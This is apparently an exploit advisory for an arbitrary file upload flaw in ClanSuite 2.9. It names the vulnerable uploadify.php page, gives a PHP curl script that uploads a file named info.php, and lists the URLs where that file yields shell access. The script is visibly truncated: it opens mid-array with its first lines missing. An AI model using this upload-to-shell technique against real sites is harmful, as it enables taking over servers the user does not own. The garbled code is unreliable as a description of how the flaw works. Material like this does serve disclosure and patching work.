########################################################### # # Exploit Title: ClanSuite 2.9 Arbitrary File Upload # Date: 29/05/2012 # Exploit Author: Adrien Thierry # Vendor Homepage: http://clansuite.com/ # Software Link : https://github.com/jakoch/Clansuite # or : http://svn.gna.org/svn/clansuite/trunk/ # Version: 2.9 and Trunk Revision 6400 # ########################################################### Vuln page : uploads/uploadify.php exploit : "@$u", 'name'=>"info.php")); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); $e = curl_exec($c); curl_close($c); echo $e; ?> shell access : http://mysite.com/uploads/temps/info.php or : http://mysite.com/application/uploads/temps/info.php #####################################################################